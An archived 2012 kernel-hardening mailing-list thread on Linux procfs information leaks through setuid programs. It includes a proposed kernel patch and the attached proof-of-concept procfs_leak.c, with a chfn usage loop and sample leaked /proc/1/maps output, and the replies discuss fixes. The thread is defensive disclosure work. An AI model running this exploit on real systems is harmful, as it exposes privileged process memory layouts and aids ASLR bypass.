All of lore.kernel.org
 help / color / mirror / Atom feed
* [kernel-hardening] procfs: infoleaks and DAC permissions
@ 2012-02-10  2:06 Djalal Harouni
  2012-02-10 14:36 ` Vasiliy Kulikov
  2012-02-11 10:07 ` Solar Designer
  0 siblings, 2 replies; 16+ messages in thread
From: Djalal Harouni @ 2012-02-10  2:06 UTC (permalink / raw)
  To: Vasiliy Kulikov, Kees Cook, kernel-hardening, Jason A. Donenfeld
  Cc: Solar Designer

[-- Attachment #1: Type: text/plain, Size: 9607 bytes --]

Hi Vasiliy, Kees, list,

According to this thread 'Linux procfs infoleaks via self-read by a
SUID/SGID program' [1] and to Jason A. Donenfeld there are still some
procfs leaks.

I'm writing to discuss these things here before trying lkml, thanks in
advance.


Actually these infoleaks are not just related to self-read, I believe that
there are some arbitrary /proc/$pid/ info leaks, which can be used to
bypass ASLR, to read kernel threads stack (fingerprint function offsets)...


At least there are two issues for the procfs:

1) Infoleaks via self-read by a suid/guid:
   As noted in the thread [1], this probably affects most of the procfs
   seq files.
   - fd = open(/proc/self/maps...)
   - exec a setuid program
   - fd = /proc/pid_of_setuid/maps
     (due to the 'task_struct' and 'mm_struct' lookup logic).
   - read data from fd, this will pass ptrace_may_access() check.
   - setuid program gives data.

   The attached PoC 'procfs_leak.c' can be used to read 'smaps' of the
   setuid 'chfn', instructions on how to use it can be found at [1].

   I believe to fix this we should just let 'mm_struct' point to the old
   one (as done by Linus' commit [2] for the /proc/self/mem) and check
   the 'mm_struct->mm_users' on each read/lseek/write... to see if that
   mm_struct is still referenced or not. There is a small window when we
   can pass the 'mm_struct->mm_users' check but hopefully the 'mm_struct'
   point to the old one, next one will fail.


2) DAC permissions and suid/guid/privileged programs (userspace):
   This is a list of files that are supposed to be protected:
   /proc/<pid>/maps
   /proc/<pid>/numa_maps
   /proc/<pid>/smaps
   /proc/<pid>/pagemap      Page table
   /proc/<pid>/personality
   /proc/<pid>/stack        Enbled by CONFIG_STACKTRACE
   /proc/<pid>/syscall
   more... ?

Currently these files do not follow DAC. Userspace assumes that if the
open(file, O_RDONLY...) succeed then the read() will also succeed.
However this is not the case with these files.
They are 0444, the open() will succeed but the read() will fail due to the
ptrace_may_access() check. This will break userspace.
 open() => success
 lseek() => fail
 read() => fail

Now if we manage to:
- Find a setuid/privileged program that reads user specified files.
- setuid program drops privileges temporarily.
- setuid program opens user file: '/proc/1/maps' to _get_ the fd.
  open() will succeed
- setuid program restores privileges
- setuid program calls lseek,read... on the previous fd.
- Information leakage...

You can also pass the fd to a privileged program, this will leak these
/proc/<pid>/ files.
The 'chfn' according to config will not ask for a password => we can
read /proc/1/maps ... 

With ordinary files this should fail but these procfs files are special.


A partial fix for this (2):
Procfs 'hidepid=' mount option which can be used to restrict access to
arbitrary /proc/<pid>/ files, Vasiliy commit [3], congrats.
But if the procfs 'gid=' mount option is used then it can give permissions
back to read these files if the user is part of the 'gid' group. IOW this
will just restore the previous vulnerable situation.


These files should just follow DAC and be 0400, I know about glibc
breakage. At least files that do not break glibc should be 0400 and
prevent self-read infoleak.


The attached patch was only tested against 'maps' and 'smaps' and it is
based on Linus' patch [2] for /proc/self/mem. At first I was planning to
avoid the check at the open() since I found from old threads that this can
break glibc "-D_FORTIFY_SOURCE=2 -O2" [3] [4], these days '%n' should be
just banned.

But doing the check in the open() and following DAC seems the right thing,
BTW the patch adds the 'mm_struct' to the 'proc_maps_private', and it is
used to reference the address space, that 'task_struct' should be removed
from the 'proc_maps_private'.

What do you think ?

Thanks.


[1] http://www.openwall.com/lists/oss-security/2012/02/08/2
[2] http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=e268337dfe26dfc7efd422a804dbb27977a3cccc
[3] http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=0499680a42141d86417a8fbaa8c8db806bea1201
[4] http://lkml.org/lkml/2007/3/10/250
[5] http://lkml.org/lkml/2006/1/22/150

-- 
tixxdz
http://opendz.org


From: Djalal Harouni <tixxdz@opendz.org>
Subject: [PATCH] proc: fix maps and smaps infoleak

Signed-off-by: Djalal Harouni <tixxdz@opendz.org>
---
 fs/proc/internal.h |    1 +
 fs/proc/task_mmu.c |   79 ++++++++++++++++++++++++++++++++++++++++-----------
 2 files changed, 63 insertions(+), 17 deletions(-)

diff --git a/fs/proc/internal.h b/fs/proc/internal.h
index 2925775..e56b899 100644
--- a/fs/proc/internal.h
+++ b/fs/proc/internal.h
@@ -64,6 +64,7 @@ extern const struct inode_operations proc_net_inode_operations;
 struct proc_maps_private {
 	struct pid *pid;
 	struct task_struct *task;
+	struct mm_struct *mm;
 #ifdef CONFIG_MMU
 	struct vm_area_struct *tail_vma;
 #endif
diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
index 7dcd2a2..e8f8e40 100644
--- a/fs/proc/task_mmu.c
+++ b/fs/proc/task_mmu.c
@@ -103,10 +103,16 @@ static void *m_start(struct seq_file *m, loff_t *pos)
 {
 	struct proc_maps_private *priv = m->private;
 	unsigned long last_addr = m->version;
-	struct mm_struct *mm;
 	struct vm_area_struct *vma, *tail_vma = NULL;
+	struct mm_struct *mm = priv->mm;
 	loff_t l = *pos;
 
+	if (!mm)
+		return NULL;
+
+	if (!atomic_inc_not_zero(&mm->mm_users))
+		return NULL;
+
 	/* Clear the per syscall fields in priv */
 	priv->task = NULL;
 	priv->tail_vma = NULL;
@@ -121,16 +127,9 @@ static void *m_start(struct seq_file *m, loff_t *pos)
 	if (last_addr == -1UL)
 		return NULL;
 
-	priv->task = get_pid_task(priv->pid, PIDTYPE_PID);
-	if (!priv->task)
-		return ERR_PTR(-ESRCH);
-
-	mm = mm_for_maps(priv->task);
-	if (!mm || IS_ERR(mm))
-		return mm;
 	down_read(&mm->mmap_sem);
 
-	tail_vma = get_gate_vma(priv->task->mm);
+	tail_vma = get_gate_vma(mm);
 	priv->tail_vma = tail_vma;
 
 	/* Start with last addr hint */
@@ -193,15 +192,37 @@ static void m_stop(struct seq_file *m, void *v)
 static int do_maps_open(struct inode *inode, struct file *file,
 			const struct seq_operations *ops)
 {
+	struct task_struct *task;
+	struct mm_struct *mm;
 	struct proc_maps_private *priv;
-	int ret = -ENOMEM;
+	int ret = -ESRCH;
+
+	task = get_proc_task(file->f_path.dentry->d_inode);
+	if (!task)
+		return ret;
+
+	mm = mm_for_maps(task);
+	put_task_struct(task);
+
+	if (IS_ERR(mm))
+		return PTR_ERR(mm);
+
+	if (mm) {
+		/* ensure this mm_struct can't be freed */
+		atomic_inc(&mm->mm_count);
+		/* but do not pin its memory */
+		mmput(mm);
+	}
+
+	ret = -ENOMEM;
 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
 	if (priv) {
-		priv->pid = proc_pid(inode);
 		ret = seq_open(file, ops);
 		if (!ret) {
 			struct seq_file *m = file->private_data;
 			m->private = priv;
+			priv->pid = proc_pid(inode);
+			priv->mm = mm;
 		} else {
 			kfree(priv);
 		}
@@ -209,6 +230,22 @@ static int do_maps_open(struct inode *inode, struct file *file,
 	return ret;
 }
 
+static int do_maps_release(struct inode *inode, struct file *file)
+{
+	int ret = 0;
+	struct seq_file *seq = file->private_data;
+
+	if (seq && seq->private) {
+		struct proc_maps_private *priv = seq->private;
+		if (priv->mm)
+			mmdrop(priv->mm);
+
+		ret = seq_release_private(inode, file);
+	}
+
+	return ret;
+}
+
 static void show_map_vma(struct seq_file *m, struct vm_area_struct *vma)
 {
 	struct mm_struct *mm = vma->vm_mm;
@@ -279,12 +316,11 @@ static int show_map(struct seq_file *m, void *v)
 {
 	struct vm_area_struct *vma = v;
 	struct proc_maps_private *priv = m->private;
-	struct task_struct *task = priv->task;
 
 	show_map_vma(m, vma);
 
 	if (m->count < m->size)  /* vma is copied successfully */
-		m->version = (vma != get_gate_vma(task->mm))
+		m->version = (vma != get_gate_vma(priv->mm))
 			? vma->vm_start : 0;
 	return 0;
 }
@@ -301,11 +337,16 @@ static int maps_open(struct inode *inode, struct file *file)
 	return do_maps_open(inode, file, &proc_pid_maps_op);
 }
 
+static int maps_release(struct inode *inode, struct file *file)
+{
+	return do_maps_release(inode, file);
+}
+
 const struct file_operations proc_maps_operations = {
 	.open		= maps_open,
 	.read		= seq_read,
 	.llseek		= seq_lseek,
-	.release	= seq_release_private,
+	.release	= maps_release,
 };
 
 /*
@@ -425,7 +466,6 @@ static int smaps_pte_range(pmd_t *pmd, unsigned long addr, unsigned long end,
 static int show_smap(struct seq_file *m, void *v)
 {
 	struct proc_maps_private *priv = m->private;
-	struct task_struct *task = priv->task;
 	struct vm_area_struct *vma = v;
 	struct mem_size_stats mss;
 	struct mm_walk smaps_walk = {
@@ -474,7 +514,7 @@ static int show_smap(struct seq_file *m, void *v)
 			(unsigned long)(mss.pss >> (10 + PSS_SHIFT)) : 0);
 
 	if (m->count < m->size)  /* vma is copied successfully */
-		m->version = (vma != get_gate_vma(task->mm))
+		m->version = (vma != get_gate_vma(priv->mm))
 			? vma->vm_start : 0;
 	return 0;
 }
@@ -491,11 +531,16 @@ static int smaps_open(struct inode *inode, struct file *file)
 	return do_maps_open(inode, file, &proc_pid_smaps_op);
 }
 
+static int smaps_release(struct inode *inode, struct file *file)
+{
+	return do_maps_release(inode, file);
+}
+
 const struct file_operations proc_smaps_operations = {
 	.open		= smaps_open,
 	.read		= seq_read,
 	.llseek		= seq_lseek,
-	.release	= seq_release_private,
+	.release	= smaps_release,
 };
 
 static int clear_refs_pte_range(pmd_t *pmd, unsigned long addr,
-- 
1.7.1


[-- Attachment #2: procfs_leak.c --]
[-- Type: text/x-c, Size: 2145 bytes --]

/*
* Procfs leak
* Author: Djalal Harouni   tixxdz  opendz.org
* License: GPLv2
* 
* Note:
* Running a setuid program that reads data from a user controled
* fd (open(),dup()...) and prints it to a file/terminal readable by
* the user can lead to information leakage.
*
*
* Can leak arbitrary files if you find your setuid winner or just
* play with /proc/self/ ...
*
*
* To test 'chfn'
* 1) set your user password to (without quotes):
* "Locked:                0 kB"
*
* 2) Run this on x86_64 (we use the 'chfn' for a quick test):
* $ for i in $(seq 460 480); \
*   do ./procfs_leak /usr/bin/chfn /proc/self/smaps $i; \
*   done
*
* If it did not work then just adjust the offset or ... ?
*
* For testing only.
*
* 02-02-2012
*/

#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define SYS_lseek       8

/* keep in mind that procfs lseek() checks ptrace_may_access() */
loff_t kernel_lseek(int fd, loff_t offset)
{
	return syscall(SYS_lseek, fd, offset, SEEK_SET);
}

int leak(char *prog, char *file, loff_t offset)
{
	int ret;
	int fd_leak;
	char *argv[] = {prog, NULL};

	ret = -1;
	fd_leak = open(file, O_RDONLY);
	if (fd_leak == -1) {
		perror("open");
		return ret;
	}

	if (dup2(fd_leak, STDIN_FILENO) == -1) {
		perror("dup2");
		return ret;
	}
	
	if (offset > 0) {
		/* Can fail on arbitrary files due to the
		* ptrace_may_access() check */
		if (kernel_lseek(STDIN_FILENO, offset) < 0) {
			perror("lseek");
			return ret;
		}
	}
	
	sleep(1);
	execv(argv[0], argv);
	perror("execv");
	
	return ret;
}

int main(int argc, char **argv)
{
	char *program = NULL;
	char *proc_file = NULL;
	loff_t offset = 0;

	if (argc < 3) {
		printf("%s  <program>  <proc_file>  <offset>\n"
		"    <program>: path of a setuid program.\n"
		"    <proc_file>: file to read.\n"
		"    <offset>: Offset.\n", argv[0]);
		return 0;
	} else if (argc == 4) {
		offset = (loff_t) strtol(argv[3], NULL, 0);
	}

	program = argv[1];
	proc_file = argv[2];

	return leak(program, proc_file, offset);
}

^ permalink raw reply related	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-10  2:06 [kernel-hardening] procfs: infoleaks and DAC permissions Djalal Harouni
@ 2012-02-10 14:36 ` Vasiliy Kulikov
  2012-02-11  9:20   ` Solar Designer
                     ` (3 more replies)
  2012-02-11 10:07 ` Solar Designer
  1 sibling, 4 replies; 16+ messages in thread
From: Vasiliy Kulikov @ 2012-02-10 14:36 UTC (permalink / raw)
  To: Djalal Harouni
  Cc: Kees Cook, kernel-hardening, Jason A. Donenfeld, Solar Designer

Hi,

On Fri, Feb 10, 2012 at 03:06 +0100, Djalal Harouni wrote:
> At least there are two issues for the procfs:
> 
> 1) Infoleaks via self-read by a suid/guid:
>    As noted in the thread [1], this probably affects most of the procfs
>    seq files.
>    - fd = open(/proc/self/maps...)
>    - exec a setuid program
>    - fd = /proc/pid_of_setuid/maps
>      (due to the 'task_struct' and 'mm_struct' lookup logic).
>    - read data from fd, this will pass ptrace_may_access() check.
>    - setuid program gives data.

AFAICS, it affects not only seq files, but every file: you can open
/proc/self/* and pass it to a setuid binary.

> 2) DAC permissions and suid/guid/privileged programs (userspace):
>    This is a list of files that are supposed to be protected:
>    /proc/<pid>/maps
>    /proc/<pid>/numa_maps
>    /proc/<pid>/smaps
>    /proc/<pid>/pagemap      Page table
>    /proc/<pid>/personality
>    /proc/<pid>/stack        Enbled by CONFIG_STACKTRACE
>    /proc/<pid>/syscall
>    more... ?
[...]
> A partial fix for this (2):
> Procfs 'hidepid=' mount option which can be used to restrict access to
> arbitrary /proc/<pid>/ files, Vasiliy commit [3], congrats.
> But if the procfs 'gid=' mount option is used then it can give permissions
> back to read these files if the user is part of the 'gid' group. IOW this
> will just restore the previous vulnerable situation.

It is even weaker - you could trick setuid $SPID to open /proc/$PID/maps,
do exec(setuid_app) as $PID and read setuid_app's maps as $SPID.

> These files should just follow DAC and be 0400, I know about glibc
> breakage. At least files that do not break glibc should be 0400 and
> prevent self-read infoleak.

It doesn't work as I've showed above.


I think the solution of (1) should follow the rule:

Any procfs file which has a ptrace check at open() time must not be
readable by any process unless both the target process and the reader
are the same as at open() time.  The reader check is needed for
[open - reader process exec to SUID - read] vuln.  The target check is
needed for [open - target process exec to SUID - read] vuln.

For mm-related files it is possible to store target->mm, but IMO it is
more universal to store task->exec_id for both source and target
processes as in Spender's patch [1].

I cannot find any solution of (2) except actually add ptrace check at
open() time...  Looks like we have to check what specific action glibc 
does with /proc/$pid/maps and whitelist these idiotic actions.  I hope
it is not arbitrary reads :-)


[1] http://grsecurity.net/~spender/dev_patches/distros_should_sponsor_me_for_doing_their_jobs.patch

Thanks,

--
Vasiliy Kulikov
http://www.openwall.com - bringing security into open computing environments

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-10 14:36 ` Vasiliy Kulikov
@ 2012-02-11  9:20   ` Solar Designer
  2012-02-11 10:21     ` Vasiliy Kulikov
  2012-02-12  0:19   ` Djalal Harouni
                     ` (2 subsequent siblings)
  3 siblings, 1 reply; 16+ messages in thread
From: Solar Designer @ 2012-02-11  9:20 UTC (permalink / raw)
  To: kernel-hardening

On Fri, Feb 10, 2012 at 06:36:17PM +0400, Vasiliy Kulikov wrote:
> On Fri, Feb 10, 2012 at 03:06 +0100, Djalal Harouni wrote:
> > 2) DAC permissions and suid/guid/privileged programs (userspace):
> >    This is a list of files that are supposed to be protected:
> >    /proc/<pid>/maps
...
> I cannot find any solution of (2) except actually add ptrace check at
> open() time...  Looks like we have to check what specific action glibc 
> does with /proc/$pid/maps and whitelist these idiotic actions.  I hope
> it is not arbitrary reads :-)

I did not look into this closely, but my current understanding is that
apparently glibc reads the process' own proc files only, and restricting
their perms to 0400 breaks this if the process changes euid/fsuid during
its runtime.  Right?

How about including a DAC bypass (perhaps limited to certain files only)
if the calling process' PID matches the PID in the pathname?  This feels
very dirty, but it might work.  I mention this possibility primarily
such that maybe we can arrive at something cleaner based on this thought.

Oh, here's a slightly cleaner alternative: instead of basing this on a
PID match, base it on unique exec_id match.  I am referring to those
from Spender's patch:

> [1] http://grsecurity.net/~spender/dev_patches/distros_should_sponsor_me_for_doing_their_jobs.patch

BTW, I like this approach.

So maybe we can use it not only as an extra requirement, but also as a
way to bypass DAC... which still feels dirty, though. %-)

Alexander

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-10  2:06 [kernel-hardening] procfs: infoleaks and DAC permissions Djalal Harouni
  2012-02-10 14:36 ` Vasiliy Kulikov
@ 2012-02-11 10:07 ` Solar Designer
  2012-02-12 15:36   ` Djalal Harouni
  1 sibling, 1 reply; 16+ messages in thread
From: Solar Designer @ 2012-02-11 10:07 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Jason A. Donenfeld

On Fri, Feb 10, 2012 at 03:06:58AM +0100, Djalal Harouni wrote:
> 1) Infoleaks via self-read by a suid/guid:
...
>    I believe to fix this we should just let 'mm_struct' point to the old
>    one (as done by Linus' commit [2] for the /proc/self/mem)

I dislike this approach because it introduces a resource limits bypass.
When you hold an mm, you hold all data of the old process in VM, right?

> 2) DAC permissions and suid/guid/privileged programs (userspace):
>    This is a list of files that are supposed to be protected:
...
> Now if we manage to:
> - Find a setuid/privileged program that reads user specified files.
> - setuid program drops privileges temporarily.
> - setuid program opens user file: '/proc/1/maps' to _get_ the fd.
>   open() will succeed
> - setuid program restores privileges
> - setuid program calls lseek,read... on the previous fd.
> - Information leakage...

Oh, my ideas from the previous message don't deal with this attack.
There will be a PID match and an exec_id match here.

Looks like the program can't be trusted to read its own proc files,
then. %-)  It could be trusted to obtain the same info via other means
where the request is definitely hard-coded rather than user triggered
(such as via a user-passed filename or fd).

Hmm, how about allowing self-reads only if the passed filename is in
.rodata?  Would this satisfy glibc's needs?  Sounds awfully hackish,
though.  I am just brainstorming.

Maybe what we really need in the long term is a prctl() option that
will deliver whatever glibc needs to know.  Or we can have this info
in the auxiliary vector passed on execve().  Then we'd be able to setup
proper DAC perms on the proc files and not introduce any bypass.
Of course, this will require a glibc patch and a transition period of
some years.

> A partial fix for this (2):
> Procfs 'hidepid=' mount option which can be used to restrict access to
> arbitrary /proc/<pid>/ files, Vasiliy commit [3], congrats.

This works against fd passing to a privileged process (you need to be
able to open() the proc file first, which will fail for someone else's
process), but not for SUID self-reads.

BTW, what about SGIDs and processes with fscaps?  The invoking user
remains the owner of the /proc/<pid> directory, yet the process is
somewhat privileged.  Maybe we need to harden that.

> ... these days '%n' should be just banned.

"%n" is a useful and safe feature in some rare cases.  I don't really
mind it slowly going away, but while it's there and not planned for
removal (as far as I'm aware), I also don't mind using it in my code.
An URL detector:

	start = domain = path = end = -1; slash = '.';
	n = sscanf(data, " %n%*4[fhtp]://%n%*[.a-zA-Z0-9-]%n%c%*[a-zA-Z0-9._~%!$&'()*+,;=:@?#/-]%n", &start, &domain, &path, &slash, &end);
	if (n >= 1 && start >= 0 && domain > start && path > domain &&
	    slash != '.' &&
	    (!strncmp(data + start, "ftp", 3) ||
	    !strncmp(data + start, "http", 4))) {
		if (slash != '/' || end < path)
			end = path;

Four uses of "%n" here. ;-)  This is unreleased code, though, and I've
since replaced it with a much longer implementation that uses more
explicit checks and does not depend on "%n".

Alexander

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-11  9:20   ` Solar Designer
@ 2012-02-11 10:21     ` Vasiliy Kulikov
  2012-02-11 13:31       ` Solar Designer
  0 siblings, 1 reply; 16+ messages in thread
From: Vasiliy Kulikov @ 2012-02-11 10:21 UTC (permalink / raw)
  To: kernel-hardening

On Sat, Feb 11, 2012 at 13:20 +0400, Solar Designer wrote:
> On Fri, Feb 10, 2012 at 06:36:17PM +0400, Vasiliy Kulikov wrote:
> > On Fri, Feb 10, 2012 at 03:06 +0100, Djalal Harouni wrote:
> > > 2) DAC permissions and suid/guid/privileged programs (userspace):
> > >    This is a list of files that are supposed to be protected:
> > >    /proc/<pid>/maps
> ...
> > I cannot find any solution of (2) except actually add ptrace check at
> > open() time...  Looks like we have to check what specific action glibc 
> > does with /proc/$pid/maps and whitelist these idiotic actions.  I hope
> > it is not arbitrary reads :-)
> 
> I did not look into this closely, but my current understanding is that
> apparently glibc reads the process' own proc files only, and restricting
> their perms to 0400 breaks this if the process changes euid/fsuid during
> its runtime.  Right?

Yes, AFAICS, it looks whether a specific memory area is RW.  But looking
at "grep -r /proc/self/ glibc-sources/" output I can say /proc/self/maps
is not the only file usage which might be broken by open() restricting.


> How about including a DAC bypass (perhaps limited to certain files only)
> if the calling process' PID matches the PID in the pathname?

You mean s/PID/task_struct/ as PID is not a system global id in case of
pid namespaces.


>  This feels
> very dirty, but it might work.  I mention this possibility primarily
> such that maybe we can arrive at something cleaner based on this thought.
> 
> Oh, here's a slightly cleaner alternative: instead of basing this on a
> PID match, base it on unique exec_id match.

More clean way - leave 0444 POSIX perms, but add a check at open():

if (current != task && !ptrace_may_access(task, PTRACE_MODE_READ))
	return -EPERM;

We should not limit processes to POSIX security domains, but to any
defined Linux domains including LSMs.  In general, POSIX permissions in
/proc/$PID/* are obscure exactly because of such non-POSIX security models.


>  I am referring to those
> from Spender's patch:
> 
> > [1] http://grsecurity.net/~spender/dev_patches/distros_should_sponsor_me_for_doing_their_jobs.patch
> 
> BTW, I like this approach.

It is very similar to ->self_exec_id, which was used before, but with
really unique ids ;)

-- 
Vasiliy

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-11 10:21     ` Vasiliy Kulikov
@ 2012-02-11 13:31       ` Solar Designer
  0 siblings, 0 replies; 16+ messages in thread
From: Solar Designer @ 2012-02-11 13:31 UTC (permalink / raw)
  To: kernel-hardening

On Sat, Feb 11, 2012 at 02:21:06PM +0400, Vasiliy Kulikov wrote:
> On Sat, Feb 11, 2012 at 13:20 +0400, Solar Designer wrote:
> > I did not look into this closely, but my current understanding is that
> > apparently glibc reads the process' own proc files only, and restricting
> > their perms to 0400 breaks this if the process changes euid/fsuid during
> > its runtime.  Right?
> 
> Yes, AFAICS, it looks whether a specific memory area is RW.  But looking
> at "grep -r /proc/self/ glibc-sources/" output I can say /proc/self/maps
> is not the only file usage which might be broken by open() restricting.

Yes, and not all pathnames are constant - there's also
"/proc/self/task/%u/comm".

Alexander

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-10 14:36 ` Vasiliy Kulikov
  2012-02-11  9:20   ` Solar Designer
@ 2012-02-12  0:19   ` Djalal Harouni
  2012-02-21 14:56   ` Solar Designer
  2012-02-21 16:34   ` Djalal Harouni
  3 siblings, 0 replies; 16+ messages in thread
From: Djalal Harouni @ 2012-02-12  0:19 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Kees Cook, Jason A. Donenfeld, Solar Designer

On Fri, Feb 10, 2012 at 06:36:17PM +0400, Vasiliy Kulikov wrote:
> Hi,
> 
> On Fri, Feb 10, 2012 at 03:06 +0100, Djalal Harouni wrote:
> > At least there are two issues for the procfs:
> > 
> > 1) Infoleaks via self-read by a suid/guid:
> >    As noted in the thread [1], this probably affects most of the procfs
> >    seq files.
> >    - fd = open(/proc/self/maps...)
> >    - exec a setuid program
> >    - fd = /proc/pid_of_setuid/maps
> >      (due to the 'task_struct' and 'mm_struct' lookup logic).
> >    - read data from fd, this will pass ptrace_may_access() check.
> >    - setuid program gives data.
> 
> AFAICS, it affects not only seq files, but every file: you can open
> /proc/self/* and pass it to a setuid binary.
Yes, brobably.

> > 2) DAC permissions and suid/guid/privileged programs (userspace):
> >    This is a list of files that are supposed to be protected:
> >    /proc/<pid>/maps
> >    /proc/<pid>/numa_maps
> >    /proc/<pid>/smaps
> >    /proc/<pid>/pagemap      Page table
> >    /proc/<pid>/personality
> >    /proc/<pid>/stack        Enbled by CONFIG_STACKTRACE
> >    /proc/<pid>/syscall
> >    more... ?
> [...]
> > A partial fix for this (2):
> > Procfs 'hidepid=' mount option which can be used to restrict access to
> > arbitrary /proc/<pid>/ files, Vasiliy commit [3], congrats.
> > But if the procfs 'gid=' mount option is used then it can give permissions
> > back to read these files if the user is part of the 'gid' group. IOW this
> > will just restore the previous vulnerable situation.
> 
> It is even weaker - you could trick setuid $SPID to open /proc/$PID/maps,
> do exec(setuid_app) as $PID and read setuid_app's maps as $SPID.
Well, if I understand that patch correctly, when procfs is mounted with
'hidepid' and without 'gid', the fix should be in the setuid application
which opens arbitrary files, right ?

My point is that open() is called by unprivileged code and it will
succeed.

>> These files should just follow DAC and be 0400, I know about glibc
>> breakage. At least files that do not break glibc should be 0400 and
>> prevent self-read infoleak.

> It doesn't work as I've showed above.
I think that I'm missing something.

> [...]
> I cannot find any solution of (2) except actually add ptrace check at
> open() time...  Looks like we have to check what specific action glibc 
> does with /proc/$pid/maps and whitelist these idiotic actions.  I hope
Seems fine with ptrace, perhaps we can also make some files 'S_IRUSR'.

> it is not arbitrary reads :-)
Currently it is:

# chmod u+s /usr/bin/wall
$ ./procfs_leak /usr/bin/wall /proc/1/maps
...
7fcf6930b000-7fcf69328000 r-xp 00000000 08:06 652945
/sbin/
init                                                                           
7fcf69527000-7fcf69529000 r--p 0001c000 08:06 652945
/sbin/
init                                                                           
7fcf69529000-7fcf6952a000 rw-p 0001e000 08:06 652945
/sbin/
init                                                                           
7fcf6b226000-7fcf6b2c4000 rw-p 00000000 00:00 0
[heap]
7fff0e916000-7fff0e937000 rw-p 00000000 00:00 0
[stack]
...

As I've said, one just need to find the appropriate program (not especially
setuid root), I did not bother to search.

> [1] http://grsecurity.net/~spender/dev_patches/distros_should_sponsor_me_for_doing_their_jobs.patch
Yes this patch should protect current configs of distros from (1).
Still some files, especially the writable ones.

Thank you for your input.

> Thanks,
> 
> --
> Vasiliy Kulikov
> http://www.openwall.com - bringing security into open computing environments

-- 
tixxdz
http://opendz.org

^ permalink raw reply	[flat|nested] 16+ messages in thread

* Re: [kernel-hardening] procfs: infoleaks and DAC permissions
  2012-02-11 10:07 ` Solar Designer
@ 2012-02-12 15:36   ` Djalal Harouni
  2012-02-13 15:50     ` Djalal Harouni
  0 siblings, 1 reply; 16+ messages in thread
From: Djalal Harouni @ 2012-02-12 15:36 UTC (permalink / raw)
  To: kernel-hardening; +Cc: Jason A. Donenfeld

On Sat, Feb 11, 2012 at 02:07:09PM +0400, Solar Designer wrote:
> On Fri, Feb 10, 2012 at 03:06:58AM +0100, Djalal Harouni wrote:
> > 1) Infoleaks via self-read by a suid/guid:
> ...
> >    I believe to fix this we should just let 'mm_struct' point to the old
> >    one (as done by Linus' commit [2] for the /proc/self/mem)
> 
> I dislike this approach because it introduces a resource limits bypass.
> When you hold an mm, you hold all data of the old process in VM, right?
I guess, but that code can be considered semantically correct since we did
not release it.

Oleg's patch [1] makes sure that 'mm->mm_users' holds the right value, if
the process drops the 'fd' the next read/write call will fail, so it will
not be visible to userspace if the original process exits. It will fail
at:
if (!atomic_inc_not_zero(&mm->mm_users))
  return NULL;

It will be freed only by the release function.


Can you elaborate more on the resource limits bypass please ?


I guess we can try this:
self_pid = getpid()
open("/proc/self_pid/mem")
execv("/proc/self_pid/comm",...)

A quick slabtop shows that mm_struct objects keep increasing...
But the 'fd' limit will kill the program, what about others ?


BTW NOMMU code fs/proc/task_nommu.c seems also affected by these issues.

> > 2) DAC permissions and suid/guid/privileged programs (userspace):
> >    This is a list of files that are supposed to be protected:
> ...
> > Now if we manage to:
> > - Find a setuid/privileged program that reads user specified files.
> > - setuid program drops privileges temporarily.
> > - setuid program opens user file: '/proc/1/maps' to _get_ the fd.
> >   open() will succeed
> > - setuid program restores privileges
> > - setuid program calls lseek,read... on the previous fd.
> > - Information leakage...
> 
> Oh, my ideas from the previous message don't deal with this attack.
> There will be a PID match and an exec_id match here.
> 
> Looks like the program can't be trusted to read its own proc files,
> then. %-)  It could be trusted to obtain the same info via other means
> where the request is definitely hard-coded rather than user triggered
> (such as via a user-passed filename or fd).
Yes.

>
> Hmm, how about allowing self-reads only if the passed filename is in
> .rodata?  Would this satisfy glibc's needs?  Sounds awfully hackish,
> though.  I am just brainstorming.
> 
> Maybe what we really need in the long term is a prctl() option that
> will deliver whatever glibc needs to know.  Or we can have this info
> in the auxiliary vector passed on execve().  Then we'd be able to setup
> proper DAC perms on the proc files and not introduce any bypass.
> Of course, this will require a glibc patch and a transition period of
> some years.
IMHO right now we should just avoid the idea of a glibc patch.

> > A partial fix for this (2):
> > Procfs 'hidepid=' mount option which can be used to restrict access to
> > arbitrary /proc/<pid>/ files, Vasiliy commit [3], congrats.
> 
> This works against fd passing to a privileged process (you need to be
> able to open() the proc file first, which will fail for someone else's
> process), but not for SUID self-reads.
Right.

> BTW, what about SGIDs and processes with fscaps?  The invoking user
> remains the owner of the /proc/<pid> directory, yet the process is
> somewhat privileged.  Maybe we need to harden that.
To pass the ptrace check: uid and gid of current and target are checked,
if it fails then there is the CAP_SYS_PTRACE check on current.

> > ... these days '%n' should be just banned.
> 
> "%n" is a useful and safe feature in some rare cases.  I don't really
> mind it slowly going away, but while it's there and not planned for
> removal (as far as I'm aware), I also don't mind using it in my code.
> An URL detector:
> 
> 	start = domain = path = end = -1; slash = '.';
> 	n = sscanf(data, " %n%*4[fhtp]://%n%*[.a-zA-Z0-9-]%n%c%*[a-zA-Z0-9._~%!$&'()*+,;=:@?#/-]%n", &start, &domain, &path, &slash, &end);
> 	if (n >= 1 && start >= 0 && domain > start && path > domain &&
> 	    slash != '.' &&
> 	    (!strncmp(data + start, "ftp", 3) ||
> 	    !strncmp(data + start, "http", 4))) {
> 		if (slash != '/' || end < path)
> 			end = path;
> 
> Four uses of "%n" here. ;-)  This is unreleased code, though, and I've
> since replaced it with a much longer implementation that uses more
> explicit checks and does not depend on "%n".
